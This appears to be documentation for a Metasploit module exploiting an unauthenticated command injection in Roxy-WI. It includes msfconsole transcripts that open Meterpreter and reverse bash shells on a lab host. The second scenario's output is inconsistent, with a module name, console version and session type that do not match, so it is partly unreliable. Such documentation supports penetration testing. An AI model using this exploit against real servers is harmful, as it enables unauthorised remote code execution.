Grant Willcox
3.4 KiB
Vulnerable Application
Description
This module exploits command injection vulnerability to achieve remote code execution. Unauthenticated users can execute a terminal command under the context of the web server user.
In versions 6.1.1.0 and earlier, an unauthenticated user can execute some methods of administrator fun without needing any credentials. Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user.
Technical details about the vulnerability can be found at here.
Setup
Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages.
https://roxy-wi.org/installation.py
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x haproxy-wi/app/*.py
sudo ./haproxy-wi/app/create_db.py
chown -R www-data:www-data haproxy-wi
Options
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/roxy_wi_exec - Set
RHOST - Set
LHOST - Set
USERNAME - Set
PASSWORD - Run
exploit - Do:
run - You should get a shell.
- Verify that you are getting
meterpretersession.
Targets
0
Python payload
1
Command payload
Scenarios
msf6 >
msf6 > use exploit/linux/http/roxy_wi_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300
meterpreter > ls
Listing: /var/www/haproxy-wi/app
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
You can also use cmd payloads.
msf6 >
msf6 > use exploit/linux/http/roxy_wi_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(linux/http/mailcleaner_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/mailcleaner_exec) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300
id
uid=1000(xxx) gid=1000(xxx) groups=1000(xxx)